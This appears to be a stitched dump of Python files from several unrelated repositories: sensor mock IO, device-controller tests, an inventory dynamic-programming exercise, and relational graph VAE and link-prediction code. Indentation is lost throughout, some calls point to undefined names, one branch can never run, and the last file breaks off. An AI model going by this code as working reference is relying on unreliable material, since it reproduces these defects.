:return: the data read.
"""
@abc.abstractmethod
def readBlock(self, i2cAddress, register, length):
pass
class mock_io(i2c_io):
def __init__(self, dataProvider=None):
super().__init__()
self.valuesWritten = []
self.dataProvider = dataProvider
self.valsToRead = Queue()
def write(self, i2cAddress, register, val):
self.valuesWritten.append([i2cAddress, register, val])
def readBlock(self, i2cAddress, register, length):
if self.dataProvider is not None:
ret = self.dataProvider(register, length)
if ret is not None:
return ret
return self.valsToRead.get_nowait()
def read(self, i2cAddress, register):
if self.dataProvider is not None:
ret = self.dataProvider(register)
if ret is not None:
return ret
return self.valsToRead.get_nowait()
class MockIoDataProvider:
@abc.abstractmethod
def provide(self, register):
pass
class WhiteNoiseProvider(MockIoDataProvider):
"""
A mock io provider which yields white noise.
"""
def __init__(self):
import numpy as np
self.samples = {
'x': np.random.normal(0, 0.25, size=1000),
'y': np.random.normal(0, 0.25, size=1000),
'z': np.random.normal(0, 0.25, size=1000)
}
self.idx = 0
def provide(self, register, length=None):
if register is mpu6050.MPU6050_RA_INT_STATUS:
return 0x01
elif register is mpu6050.MPU6050_RA_FIFO_COUNTH:
return [0b0000, 0b1100]
elif register is mpu6050.MPU6050_RA_FIFO_R_W:
bytes = bytearray()
self.addValue(bytes, 'x')
self.addValue(bytes, 'y')
self.addValue(bytes, 'z')
self.idx += 1
self.addValue(bytes, 'x')
self.addValue(bytes, 'y')
self.addValue(bytes, 'z')
return bytes
else:
if length is None:
return 0b00000000
else:
return [x.to_bytes(1, 'big') for x in range(length)]
def addValue(self, bytes, key):
val = abs(int((self.samples[key][self.idx % 1000] * 32768)))
try:
b = bytearray(val.to_bytes(2, 'big'))
except OverflowError:
print("Value too big - " + str(val) + " - replacing with 0")
val = 0
b = bytearray(val.to_bytes(2, 'big'))
bytes.extend(b)
```
#### File: analyser/common/test_devicecontroller.py
```python
import datetime
from time import sleep
from unittest.mock import MagicMock, Mock
import pytest
from analyser.common.devicecontroller import DeviceController
from core.httpclient import RecordingHttpClient
from core.interface import RecordingDeviceStatus, DATETIME_FORMAT
DEVICE_MAX_AGE_SECONDS = 1
@pytest.fixture
def httpclient():
return RecordingHttpClient()
@pytest.fixture
def targetStateController():
mm = MagicMock()
mm.update = Mock()
return mm
@pytest.fixture
def deviceController(tmpdirPath, targetStateController, httpclient):
controller = DeviceController(targetStateController, tmpdirPath, httpclient, maxAgeSeconds=DEVICE_MAX_AGE_SECONDS)
yield controller
controller.shutdown()
def test_whenNewDeviceArrives_ItIsStoredInTheCache_AndTargetStateIsReached(deviceController, targetStateController):
assert len(deviceController.getDevices()) == 0
device = {}
deviceId = 'hello'
deviceController.accept(deviceId, device)
assert len(deviceController.getDevices()) == 1
assert deviceId in [i.deviceId for i in deviceController.getDevices()]
storedDevice = deviceController.getDevice(deviceId)
assert storedDevice is not None
assert storedDevice.deviceId == deviceId
assert storedDevice.dataHandler is not None
assert storedDevice.lastUpdateTime is not None
assert storedDevice.payload is not None
assert storedDevice.payload is device
assert datetime.datetime.utcnow() >= storedDevice.lastUpdateTime
# FIXFIX I appear to have no clue how to use python's mock, this appears to be pass but blows up inside the
# equals function
# assert targetStateController.update.assert_called_once_with(device)
def test_whenDeviceIsHeardFrom_ItIsKeptAlive_AndEvicted_IfIsGoesSilent(deviceController, targetStateController):
test_whenNewDeviceArrives_ItIsStoredInTheCache_AndTargetStateIsReached(deviceController, targetStateController)
sleep(DEVICE_MAX_AGE_SECONDS / 2)
assert len(deviceController.getDevices()) == 1
assert 'hello' in [i.deviceId for i in deviceController.getDevices()]
deviceController.accept('hello', {})
assert len(deviceController.getDevices()) == 1
assert 'hello' in [i.deviceId for i in deviceController.getDevices()]
sleep(DEVICE_MAX_AGE_SECONDS + 0.2)
assert len(deviceController.getDevices()) == 1
def test_canGetDevicesByStatus(deviceController):
oldDevice = {'status': 'OLD'}
deviceController.accept('old', oldDevice)
newDevice = {'status': 'NEW'}
deviceController.accept('new', newDevice)
assert len(deviceController.getDevices()) == 2
oldDevices = deviceController.getDevices('OLD')
assert len(oldDevices) == 1
assert oldDevices[0] is not None
assert oldDevices[0].deviceId is not None
assert oldDevices[0].deviceId == 'old'
newDevices = deviceController.getDevices('NEW')
assert len(newDevices) == 1
assert newDevices[0] is not None
assert newDevices[0].deviceId is not None
assert newDevices[0].deviceId == 'new'
def test_measurementsAreNotScheduledForUninitialisedDevices(deviceController):
device = {'status': 'OLD'}
deviceController.accept('old', device)
devices = deviceController.getDevices('OLD')
assert len(devices) == 1
assert devices[0] is not None
assert devices[0].deviceId is not None
assert devices[0].deviceId == 'old'
assert len(deviceController.scheduleMeasurement('next', 10, datetime.datetime.utcnow())) == 0
def test_measurementsAreScheduledForInitialisedDevices(deviceController, httpclient):
device = {'status': RecordingDeviceStatus.INITIALISED.name, 'serviceURL': 'hello'}
deviceController.accept('old', device)
devices = deviceController.getDevices(RecordingDeviceStatus.INITIALISED.name)
assert len(devices) == 1
assert devices[0] is not None
assert devices[0].deviceId is not None
assert devices[0].deviceId == 'old'
startTime = datetime.datetime.utcnow()
measurement = deviceController.scheduleMeasurement('next', 10, startTime)
assert len(measurement) == 1 # there is a response
assert len(httpclient.record) == 1 # measurement was sent to the device
args = httpclient.record[0]
assert len(args) == 3
# we sent a put to serviceURL/measurements/measurementId with a json payload
assert args[0] == 'put'
assert args[1] == 'hello/measurements/next'
assert type(args[2]) is dict
assert 'json' in args[2]
assert 'duration' in args[2]['json']
assert args[2]['json']['duration'] == 10
assert 'at' in args[2]['json']
assert args[2]['json']['at'] == startTime.strftime(DATETIME_FORMAT)
``` |
{
"source": "3lLobo/embed",
"score": 3
} |
#### File: embed/tests/utiltests.py
```python
import _context
from kgmodels.util import eval
import unittest
import torch
from torch import nn
import sys
class TestUtil(unittest.TestCase):
def test_eval(self):
N = 500
class Scorer(nn.Module):
def __init__(self):
super().__init__()
def forward(self, triples):
scores = triples[:, 0] if triples[0, 2] == triples[1, 2] else triples[:, 2]
return scores.to(torch.float).pow(-1.0)
model = Scorer()
testset = [(i, 0, i) for i in range(N)]
testset = torch.tensor(testset, dtype=torch.long)
mrr, hits, ranks = eval(model=model, valset=testset, alltriples=[], n=N, verbose=False)
self.assertEqual(ranks, list(range(1, N+1)) * 2)
self.assertEqual(mrr, sum([1/r for r in ranks])/len(ranks))
self.assertEqual(hits[0], 2/(N * 2)) # one correct ans for head corrupt, one for tail
self.assertEqual(hits[1], 6/(N * 2))
self.assertEqual(hits[2], 20/(N * 2))
``` |
{
"source": "3lLobo/ReinforcementLearningAndPlanning",
"score": 3
} |
#### File: ReinforcementLearningAndPlanning/Assignment1/main.py
```python
import numpy as np
import pandas as pd
import seaborn as sns
''' Parameter setting '''
steps = 1000
demand = 1
sell_price = 20
purch_price = 10
order_limit = 900
M = steps # Assuming the max of one demand per time step
runs = 10
seed = 6 # Set random seed for reproducibility
def main():
''' The grid will store the values for all possible states. '''
value_grid = np.zeros((steps, M))
profit_grid = np.zeros((steps, M))
order_grid = np.zeros((steps, M))
demand_list = np.zeros(steps)
for run in range(runs):
''' Loop over all timesteps and x values. '''
# Set individual seed for every run
np.random.seed( seed+run )
print('Start simulation! Run %d' % run)
for t in range(steps-1, 0, -1):
for x in range(M):
demand_prob = (t+1)/steps
demand_t = np.random.choice([demand, 0], 1, p=[demand_prob, 1-demand_prob])
demand_list[t] = demand_t
# Define constrains of purchase price
if t > 500:
k = purch_price + 5
elif t > 900:
k = 100000
else:
k = purch_price
# Define the possible order volume
if demand > x:
n_order = np.linspace(demand_t-x, M-x+demand_t, M, dtype=int, endpoint=False)
else:
n_order = np.linspace(0, M-x+demand_t, M-x+demand_t, dtype=int, endpoint=False)
# Consider ecxeption for final state
if t == 999:
p = demand_t * sell_price - x * purch_price
p_order = 0
else:
p = demand_t * sell_price - n_order * k + profit_grid[t+1, x-demand_t+n_order]
max_idx = np.argmax(p)
p = p[max_idx]
p_order = n_order[max_idx]
# Fill in the grid with the results
profit_grid[t,x] = p
order_grid[t,x] = p_order
demand_list[t] = demand_t
''' Save Data as cvs file.'''
print('Saving ...')
df2 = pd.DataFrame()
df_order = pd.DataFrame()
df_demand = pd.DataFrame()
df_demand['Demand'] = demand_list
for n in range(steps):
df2['inventory' + str(n)] = profit_grid[:,n]
df_order['inventory' + str(n)] = order_grid[:,n]
df2.to_csv('Pgrid_%d.csv' % run)
df_order.to_csv('Ogrid_%d.csv' % run)
df_demand.to_csv("demand_time%d.csv" % run)
print('Done!')
if __name__ == "__main__":
main()
``` |
{
"source": "3lLobo/rgvae",
"score": 3
} |
#### File: data/fb15k/mk_df.py
```python
import pandas as pd
import pickle as pkl
def pkl_df(file_path, path2save):
# Load the entity dictionary
e2t = dict()
with open(file_path, 'r+') as f:
for line in f.readlines():
pair = line.split('\t', 1)
value = pair[1].replace('\n', '')
e2t[pair[0]] = value
# entity2text = pd.read_csv(file_path, header=None, sep='\t')
# entity2text.columns = ['a', 'b']
# entity_dict = entity2text.set_index('Entity').T.to_dict('series')
# del entity2text
with open(path2save+'.pkl', 'wb') as f:
pkl.dump(e2t, f)
print('Dataframe converted to dictionary and saved here: {}'.format(path2save))
if __name__ == "__main__":
path = 'data/fb15k/'
txt_file = 'entity2type.txt'
pkl_file = 'e2type_dict'
pkl_df(path+txt_file, path+pkl_file)
```
#### File: rgvae/experiments/link_prediction.py
```python
import time
import os
from torch_rgvae.GVAE import GVAE
from torch_rgvae.GCVAE import GCVAE
from torch_rgvae.train_fn import train_sparse_batch
from utils.lp_utils import *
import tqdm
import json
from datetime import date
def link_prediction(model, testsub, truedict, batch_size):
"""
Performs linkpredcition with the given model on the gives data's testset.
Saves results as json in /data folder.
:param model: torch VAE model
:param dataset: name or the dataset
:param truedict: collection of true tripples per head+rel/tail+rel set
:param batch_size: batch size
"""
n_e = model.n_e
n_r = model.n_r
with torch.no_grad():
model.train(False)
mrr, hits, ranks = eval(
model=model, valset=testsub, truedicts=truedict, n=n_e, r=n_r,
batch_size=batch_size, verbose=True, elbo=True)
print(f'MRR {mrr:.4}\t hits@1 {hits[0]:.4}\t hits@3 {hits[1]:.4}\t hits@10 {hits[2]:.4}')
lp_results = {'mrr': mrr, 'h@1': hits[0], 'h@3': hits[1], 'h@10': hits[2]}
return lp_results
if __name__ == "__main__":
# This sets the default torch dtype. Double-power
my_dtype = torch.float64
torch.set_default_dtype(my_dtype)
# Parameters. Arg parsing on its way.
n = 1 # number of triples per matrix ( = matrix_n/2)
batch_size = 16 # Choose a low batch size for debugging, or creating the dataset will take very long.
seed = 11
np.random.seed(seed=seed)
torch.manual_seed(seed)
dataset = 'fb15k'
model_path = 'data/model/GCVAE_fb15k_11e_20201025.pt'
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
# Get data
(n2i, i2n), (r2i, i2r), train_set, test_set, all_triples = load_link_prediction_data(dataset)
n_e = len(n2i)
n_r = len(r2i)
testsub = torch.tensor(test_set)
truedict = truedicts(all_triples)
# Initialize model.
model = GCVAE(n*2, n_r, n_e).to(device)
if model_path:
model.load_state_dict(torch.load(model_path, map_location=torch.device(device)))
print('Saved model loaded.')
lp_results = load_link_prediction(model, test_set, truedict, n_e, d_r, batch_size)
outfile_path = 'data/'+dataset+'/lp_results_{}_{}.txt'.format(model.name, date.today().strftime("%Y%m%d"))
with open(outfile_path, 'w') as outfile:
json.dump(lp_results, outfile)
```
#### File: torch_rgvae/layers/RGC_layers.py
```python
from utils.utils import block_diag, stack_matrices, sum_sparse
from torch.nn.modules.module import Module
from torch.nn.parameter import Parameter
from torch import nn
import math
import torch
class RelationalGraphConvolution(Module):
""" Relational Graph Convolution (RGC) Layer (as described in https://arxiv.org/abs/1703.06103)"""
def __init__(self,
triples=None,
num_nodes=None,
num_relations=None,
in_features=None,
out_features=None,
edge_dropout=None,
edge_dropout_self_loop=None,
bias=True,
decomposition=None,
vertical_stacking=False,
reset_mode='xavier'):
super(RelationalGraphConvolution, self).__init__()
assert (triples is not None or num_nodes is not None or num_relations is not None or out_features is not None), \
"The following must be specified: triples, number of nodes, number of relations and output dimension!"
# If featureless, use number of nodes instead as input dimension
in_dim = in_features if in_features is not None else num_nodes
out_dim = out_features
# Unpack arguments
weight_decomp = decomposition['type'] if decomposition is not None and 'type' in decomposition else None
num_bases = decomposition['num_bases'] if decomposition is not None and 'num_bases' in decomposition else None
num_blocks = decomposition['num_blocks'] if decomposition is not None and 'num_blocks' in decomposition else None
self.triples = triples
self.num_nodes = num_nodes
self.num_relations = num_relations
self.in_features = in_features
self.out_features = out_features
self.weight_decomp = weight_decomp
self.num_bases = num_bases
self.num_blocks = num_blocks
self.vertical_stacking = vertical_stacking
self.edge_dropout = edge_dropout
self.edge_dropout_self_loop = edge_dropout_self_loop
# Instantiate weights
if self.weight_decomp is None:
self.weights = Parameter(torch.FloatTensor(num_relations, in_dim, out_dim))
elif self.weight_decomp == 'basis':
# Weight Regularisation through Basis Decomposition
assert num_bases > 0, \
'Number of bases should be set to higher than zero for basis decomposition!'
self.bases = Parameter(torch.FloatTensor(num_bases, in_dim, out_dim))
self.comps = Parameter(torch.FloatTensor(num_relations, num_bases))
elif self.weight_decomp == 'block':
# Weight Regularisation through Block Diagonal Decomposition
assert self.num_blocks > 0, \
'Number of blocks should be set to a value higher than zero for block diagonal decomposition!'
assert in_dim % self.num_blocks == 0 and out_dim % self.num_blocks == 0,\
f'For block diagonal decomposition, input dimensions ({in_dim}, {out_dim}) must be divisible ' \
f'by number of blocks ({self.num_blocks})'
self.blocks = nn.Parameter(
torch.FloatTensor(num_relations, self.num_blocks, in_dim // self.num_blocks, out_dim // self.num_blocks))
else:
raise NotImplementedError(f'{self.weight_decomp} decomposition has not been implemented')
# Instantiate biases
if bias:
self.bias = Parameter(torch.FloatTensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters(reset_mode)
def reset_parameters(self, reset_mode='xavier'):
""" Initialise biases and weights (xavier or uniform) """
if reset_mode == 'xavier':
if self.weight_decomp == 'block':
nn.init.xavier_uniform_(self.blocks, gain=nn.init.calculate_gain('relu'))
elif self.weight_decomp == 'basis':
nn.init.xavier_uniform_(self.bases, gain=nn.init.calculate_gain('relu'))
nn.init.xavier_uniform_(self.comps, gain=nn.init.calculate_gain('relu'))
else:
nn.init.xavier_uniform_(self.weights, gain=nn.init.calculate_gain('relu'))
if self.bias is not None:
torch.nn.init.zeros_(self.bias)
elif reset_mode == 'uniform':
stdv = 1.0 / math.sqrt(self.weights.size(1))
if self.weight_decomp == 'block':
self.blocks.data.uniform_(-stdv, stdv)
elif self.weight_decomp == 'basis':
self.bases.data.uniform_(-stdv, stdv)
self.comps.data.uniform_(-stdv, stdv)
else:
self.weights.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
else:
raise NotImplementedError(f'{reset_mode} parameter initialisation method has not been implemented')
def forward(self, triples, features=None):
""" Perform a single pass of message propagation """
assert (features is None) == (self.in_features is None), \
"Layer has not been properly configured to take in features!"
in_dim = self.in_features if self.in_features is not None else self.num_nodes
# triples = self.triples
out_dim = self.out_features
edge_dropout = self.edge_dropout
weight_decomp = self.weight_decomp
num_nodes = self.num_nodes
num_relations = self.num_relations
vertical_stacking = self.vertical_stacking
# Apply edge dropout
if edge_dropout is not None and self.training:
assert 'general' in edge_dropout and 'self_loop' in edge_dropout, \
'General and self-loop edge dropouts must be specified!'
assert type(edge_dropout['general']) is float and 0.0 <= edge_dropout['general'] <= 1.0, \
"Edge dropout rates must between 0.0 and 1.0!"
general_edo = edge_dropout['general']
self_loop_edo = edge_dropout['self_loop']
triples = drop_edges(triples, num_nodes, general_edo, self_loop_edo)
# Choose weights
if weight_decomp is None:
weights = self.weights
elif weight_decomp == 'basis':
weights = torch.einsum('rb, bio -> rio', self.comps, self.bases)
elif weight_decomp == 'block':
weights = block_diag(self.blocks)
else:
raise NotImplementedError(f'{weight_decomp} decomposition has not been implemented')
# Determine whether to use cuda or not
if weights.is_cuda:
device = 'cuda'
else:
device = 'cpu'
# Stack adjacency matrices (vertically/horizontally)
adj_indices, adj_size = stack_matrices(
triples,
num_nodes,
num_relations,
vertical_stacking=vertical_stacking,
device=device
)
num_triples = adj_indices.size(0)
vals = torch.ones(num_triples, dtype=torch.float, device=device)
# Apply normalisation (vertical-stacking -> row-wise rum & horizontal-stacking -> column-wise sum)
sums = sum_sparse(adj_indices, vals, adj_size, row_normalisation=vertical_stacking, device=device)
if not vertical_stacking:
# Rearrange column-wise normalised value to reflect original order (because of transpose-trick)
n = (len(vals) - num_nodes) // 2
sums = torch.cat([sums[n:2 * n], sums[:n], sums[2 * n:]], dim=0)
vals = vals / sums
# Construct adjacency matrix
if device == 'cuda':
adj = torch.cuda.sparse.FloatTensor(indices=adj_indices.t(), values=vals, size=adj_size)
else:
adj = torch.sparse.FloatTensor(indices=adj_indices.t(), values=vals, size=adj_size)
assert weights.size() == (num_relations, in_dim, out_dim)
if self.in_features is None:
# Featureless
output = torch.mm(adj, weights.view(num_relations * in_dim, out_dim))
elif self.vertical_stacking:
# Adjacency matrix vertically stacked
af = torch.spmm(adj, features)
af = af.view(self.num_relations, self.num_nodes, in_dim)
output = torch.einsum('rio, rni -> no', weights, af)
else:
# Adjacency matrix horizontally stacked
fw = torch.einsum('ni, rio -> rno', features, weights).contiguous()
output = torch.mm(adj, fw.view(self.num_relations * self.num_nodes, out_dim))
assert output.size() == (self.num_nodes, out_dim)
if self.bias is not None:
output = torch.add(output, self.bias)
return output
```
#### File: rgvae/torch_rgvae/losses.py
```python
from graph_matching.MPGM import MPGM
from utils.utils import *
import wandb, torch
import torch.nn as nn
def graph_CEloss(target, prediction, softmax_E: bool=True, l_A=1., l_E=1., l_F=1.):
"""
Cross entropy loss function for the predicted graph. The loss for each matrix is computed separately.
Args:
target: list of the 3 target matrices A, E, F.
prediction: list of the 3 predicted matrices A_hat, E_hat, F_hat.
l_A: weight for BCE of A
l_E: weight for BCE or CE of E
l_F: weight for CE of F
softmax_E: use CE for E
"""
# Cast target vectors to tensors.
A, E, F = target
A_hat, E_hat, F_hat = prediction
# Define loss function
bce = torch.nn.BCELoss()
cce = torch.nn.CrossEntropyLoss()
sigmoid = nn.Sigmoid()
if softmax_E:
log_p_E = l_E*cce(E_hat.permute(0,3,1,2), torch.argmax(E, -1, keepdim=False))
else:
log_p_E = l_E*bce(sigmoid(E_hat), E)
log_p_A = l_A*bce(sigmoid(A_hat), A)
log_p_F = l_F*cce(F_hat.permute(0,2,1), torch.argmax(F, -1, keepdim=False))
# Weight and add loss
log_p = - log_p_A - log_p_E - log_p_F
x_permute = torch.ones_like(A) # Just a placeholder
wandb.log({"recon_loss_mean": log_p.detach().cpu().numpy(), "recon_loss_A_mean": log_p_A.detach().cpu().numpy(),
"recon_loss_E_mean": log_p_E.detach().cpu().numpy(), "recon_loss_F_mean": log_p_F.detach().cpu().numpy()})
return log_p, x_permute
def mpgm_loss(target, prediction, l_A=1., l_E=1., l_F=1., zero_diag: bool=False, softmax_E: bool=True):
"""
Modification of the loss function described in the GraphVAE paper.
The difference is, we treat A and E the same as both are sigmoided and F stays as it is softmaxed.
This way we can have multiple edge attributes.
The node attribute matrix is used to index the nodes, therefore the softmax.
Args:
target: list of the 3 target matrices A, E, F.
prediction: list of the 3 predicted matrices A_hat, E_hat, F_hat.
l_A: weight for BCE of A
l_E: weight for BCE of E
l_F: weight for BCE of F
zero_diag: if to zero out the diagonal in log_A term_3 and log_E.
"""
A, E, F = target
A_hat, E_hat, F_hat = prediction
bs = A.shape[0]
n = A.shape[1]
k = A_hat.shape[1]
d_e = E.shape[-1]
mpgm = MPGM()
sigmoid = nn.Sigmoid()
softmax = nn.Softmax(dim=-1)
A_hat = sigmoid(A_hat)
if softmax_E:
E_hat = softmax(E_hat)
else:
E_hat = sigmoid(E_hat)
F_hat = softmax(F_hat)
X = mpgm.call(A, A_hat.detach(), E, E_hat.detach(), F, F_hat.detach())
# This is the loss part from the paper:
A_t = torch.transpose(X, 2, 1) @ A @ X # shape (bs,k,n)
E_t = torch_batch_dot_v2(torch_batch_dot_v2(X, E, 1, 1, [bs,n,k,d_e]), X, -2, 1, [bs,k,k,d_e]) # target shape is (bs,k,k,d_e)
E_hat_t = torch_batch_dot_v2(torch_batch_dot_v2(X, E_hat, -1, 1, [bs,n,k,d_e]), X, -2, 1, [bs,n,n,d_e])
F_hat_t = torch.matmul(X, F_hat)
term_1 = (1/k) * torch.sum(torch.diagonal(A_t, dim1=-2, dim2=-1) * torch.log(torch.diagonal(A_hat, dim1=-2, dim2=-1)), -1, keepdim=True)
A_t_diag = torch.diagonal(A_t, dim1=-2, dim2=-1)
A_hat_diag = torch.diagonal(A_hat, dim1=-2, dim2=-1)
term_2 = (1/k) * torch.sum((torch.ones_like(A_t_diag) - A_t_diag) * torch.log((torch.ones_like(A_hat_diag) - A_hat_diag)), -1, keepdim=True)
"""
Thought: Lets compare w/ against w/o the zeroing out diagonal and see what happens.
"""
# log_p_A part. Split in multiple terms for clarity.
term_31 = A_t * torch.log(A_hat)
term_32 = (1. - A_t) * torch.log(1. - A_hat)
# Zero diagonal mask:
mask = torch.ones_like(term_32)
# The number of edges we are taking into account.
a_edges = k*k
if zero_diag:
ind = np.diag_indices(mask.shape[-1])
mask[:,ind[0], ind[1]] = 0
a_edges = (k*(k-1))
term_3 = (1/a_edges) * torch.sum((term_31 + term_32) * mask, [1,2]).unsqueeze(-1)
log_p_A = term_1 + term_2 + term_3
# log_p_F
log_p_F = (1/n) * torch.sum(torch.log(no_zero(torch.sum(F * F_hat_t, -1))), (-1)).unsqueeze(-1)
# log_p_E
if softmax_E:
log_p_E = ((1/(torch.norm(A, p=1, dim=[-2,-1]))) * torch.sum(torch.sum(torch.log(no_zero(E * E_hat_t)), -1) * mask, (-2,-1))).unsqueeze(-1)
else:
# I changed the factor to the number of edges (k*(k-1)) the -1 is for the zero diagonal.
k_zero = k
if zero_diag:
k_zero = k - 1
log_p_E = ((1/(k*(k_zero))) * torch.sum(torch.sum(E_t * torch.log(E_hat) + (1 - E_t) * torch.log(1 - E_hat), -1) * mask, (-2,-1))).unsqueeze(-1)
log_p = l_A * log_p_A + l_E * log_p_E + l_F * log_p_F
wandb.log({"recon_loss_mean": torch.mean(log_p).detach().cpu().numpy(), "recon_loss_A_mean": torch.mean(l_A * log_p_A).detach().cpu().numpy(),
"recon_loss_E_mean": torch.mean(l_E * log_p_E).detach().cpu().numpy(), "recon_loss_F_mean": torch.mean(l_F * log_p_F).detach().cpu().numpy(),
"recon_loss_std": torch.std(log_p).detach().cpu().numpy(), "recon_loss_A_std": torch.std(l_A * log_p_A).detach().cpu().numpy(),
"recon_loss_E_std": torch.std(l_E * log_p_E).detach().cpu().numpy(), "recon_loss_F_std": torch.std(l_F * log_p_F).detach().cpu().numpy(),})
return log_p, X
def kl_divergence(mean, logvar, raxis=1):
"""
KL divergence between N(mean,std) and the standard normal N(0,1).
Args:
mean: mean of a normal dist.
logvar: log variance (log(std**2)) of a normal dist.
Returns Kl divergence in batch shape.
"""
kl_term = 1/2 * torch.sum((logvar.exp() + mean.pow(2) - logvar - 1), dim=raxis)
wandb.log({"reg_loss_mean": torch.mean(kl_term).detach().cpu().numpy(), "reg_loss_std": torch.std(kl_term).detach().cpu().numpy()})
return kl_term.unsqueeze(-1)
```
#### File: rgvae/torch_rgvae/RGVAE.py
```python
import torch
import torch.nn as nn
from torch_rgvae.encoders import NodeClassifier
from torch_rgvae.GVAE import GVAE
from torch_rgvae.decoders import RMLP, sRMLP
class TorchRGVAE(GVAE):
def __init__(self, args, n_r: int, n_e: int, data, dataset_name: str):
"""
Graph Variational Auto Encoder
:param n : Number of nodes
:param n_e : Number of node attributes
:param n_r : Number of edge attributes
:param dataset_name : name of the dataset which the model will train on.
:param h_dim : Hidden dimension
:param z_dim : latent dimension
:param beta: for beta < 1, makes the model is a beta-VAE
:param softmax_E : use softmax for edge attributes
"""
super().__init__(args, n_r, n_e, dataset_name)
self.name = 'RGVAE'
self.n = n = args['n']
self.n_e = n_e
self.n_r = n_r
self.z_dim = z_dim = args['z_dim'] if 'z_dim' in args else 2
self.h_dim = h_dim = args['h_dim'] if 'h_dim' in args else 1024
beta = args['beta'] if 'beta' in args else 1.
self.delta = args['delta'] if 'delta' in args else 0.
self.beta = torch.tensor(beta)
self.softmax_E = args['softmax_E'] if 'softmax_E' in args else True
self.perm_inv = args['perm_inv'] if 'perm_inv' in args else True
self.adj_argmax = args['adj_argmax'] if 'adj_argmax' in args else True
self.clip_grad = args['clip_grad'] if 'clip_grad' in args else True
self.dataset_name = dataset_name
self.model_params = args
self.k = k = n # assumption n=k
self.encoder = NodeClassifier(triples=data,
nnodes=n_e,
nrel=n_r,
nfeat=None,
nhid=h_dim,
nlayers=1,
nclass=2*z_dim,
edge_dropout=None,
decomposition=None,)
self.decoder = sRMLP(k, 1+n_r, h_dim, self.z_dim)
# Need to init?
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_uniform(m.weight, gain=0.01)
def encode(self, triples):
"""
The encoder predicts a mean and logarithm of std of the prior distribution for the decoder.
A simple MLP decoder with a RGCN encoder.
"""
assert len(triples) == self.n
x = self.encoder(triples)
mean, logvar = torch.split(x, self.z_dim, dim=1)
return mean, logvar
def decode(self, z):
# new decoder: 15000,2 --> k,15000,15000*400
self.z = z
pred = self.decoder(z).view(self.k, -1)
return self.reconstruct(pred)
def reconstruct(self, pred):
"""
Reconstructs and returns the graph matrices from the flat prediction vector.
Args:
prediction: the predicted output of the decoder.
"""
idx2, idx1 = torch.split(pred, self.n_e*self.n_r, dim=1)
idx1 = torch.argmax(idx1, dim=-1)
idx2 = torch.argmax(idx2.view(self.k, self.n_e, -1).sum(-1), dim=-1)
idxr = torch.floor(idx2/self.n_e)
idx2 = idx2 - idxr*self.n_e
return torch.cat([idx1.unsqueeze(-1),idxr.unsqueeze(-1),idx2.unsqueeze(-1)], dim=-1)
if __name__ == "__main__":
pass
```
#### File: rgvae/utils/lp_utils.py
```python
import gzip, os, pickle, tqdm
import torch
import numpy as np
import pandas as pd
import random
import torch, os, sys, time, tqdm
from torch.autograd import Variable
import torch.nn.functional as F
from collections.abc import Iterable
from torch import nn
import re
import wandb
def locate_file(filepath):
directory = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return directory + '/' + filepath
def load_strings(file):
""" Read triples from file """
with open(file, 'r') as f:
return [line.split() for line in f]
def load_link_prediction_data(name, use_test_set=False, limit=None):
"""
Load knowledge graphs for relation Prediction experiment.
Source: https://github.com/pbloem/gated-rgcn/blob/1bde7f28af8028f468349b2d760c17d5c908b58b/kgmodels/data.py#L218
:param name: Dataset name ('aifb', 'am', 'bgs' or 'mutag')
:param use_test_set: If true, load the canonical test set, otherwise load validation set from file.
:param limit: If set, only the first n triples are used.
:return: Relation prediction test and train sets:
- train: list of edges [subject, predicate object]
- test: list of edges [subject, predicate object]
- all_triples: sets of tuples (subject, predicate object)
"""
if name.lower() == 'fb15k':
train_file = locate_file('data/fb15k/train.txt')
val_file = locate_file('data/fb15k/valid.txt')
test_file = locate_file('data/fb15k/test.txt')
elif name.lower() == 'fb15k-237':
train_file = locate_file('data/fB15k-237/train.txt')
val_file = locate_file('data/fB15k-237/valid.txt')
test_file = locate_file('data/fB15k-237/test.txt')
elif name.lower() == 'wn18':
train_file = locate_file('data/wn18/train.txt')
val_file = locate_file('data/wn18/valid.txt')
test_file = locate_file('data/wn18/test.txt')
elif name.lower() == 'wn18rr':
train_file = locate_file('data/wn18rr/train.txt')
val_file = locate_file('data/wn18rr/valid.txt')
test_file = locate_file('data/wn18rr/test.txt')
else:
raise ValueError(f'Could not find \'{name}\' dataset')
train = load_strings(train_file)
val = load_strings(val_file)
test = load_strings(test_file)
if use_test_set:
train = train + val
else:
test = val
if limit:
train = train[:limit]
test = test[:limit]
# Mappings for nodes (n) and relations (r)
nodes, rels = set(), set()
for i in train + val + test:
if len(i) < 3:
print(i)
for s, p, o in train + test:
nodes.add(s)
rels.add(p)
nodes.add(o)
i2n, i2r = list(nodes), list(rels)
n2i, r2i = {n: i for i, n in enumerate(nodes)}, {r: i for i, r in enumerate(rels)}
all_triples = set()
for s, p, o in train + test:
all_triples.add((n2i[s], r2i[p], n2i[o]))
train = [[n2i[st[0]], r2i[st[1]], n2i[st[2]]] for st in train]
test = [[n2i[st[0]], r2i[st[1]], n2i[st[2]]] for st in test]
return (n2i, i2n), (r2i, i2r), train, test, all_triples
def triple2matrix(triples, max_n: int, max_r: int):
"""
Transforms triples into matrix form.
Params:
triples: set of sparse triples
max_n: total count of nodes
max_t: total count of relations
Outputs the A,E,F matrices for the input triples,
"""
# An exception for single triples.
triples = triples.detach().cpu().numpy()
n_list = list(dict.fromkeys([triple[0] for triple in triples]))+list(dict.fromkeys([triple[2] for triple in triples]))
n_dict = dict(zip(n_list, np.arange(len(n_list))))
n = 2*len(triples) # All matrices must be of same size
# The empty first dimension is to stacking into batches.
A = torch.zeros((1,n,n), device=d())
E = torch.zeros((1,n,n,max_r), device=d())
F = torch.zeros((1,n,max_n), device=d())
for (s, r, o) in triples:
i_s, i_o = n_dict[s], n_dict[o]
A[0,i_s,i_o] = 1
E[0,i_s,i_o,r] = 1
F[0,i_s,s] = 1
F[0,i_o,o] = 1
return (A, E, F)
def matrix2triple(graph):
"""
Converts a sparse graph back to triple from.
Args:
graph: Graph consisting of A, E, F matrix
returns a set of triples/one triple.
"""
A, E, F = graph
a = A.squeeze().detach().cpu().numpy()
e = E.squeeze().detach().cpu().numpy()
f = F.squeeze().detach().cpu().numpy()
s, o = np.where(a != 0)
triples = list()
for i in range(len(s)):
if len(e.shape) == 2:
r = e[s[i],o[i]]
else:
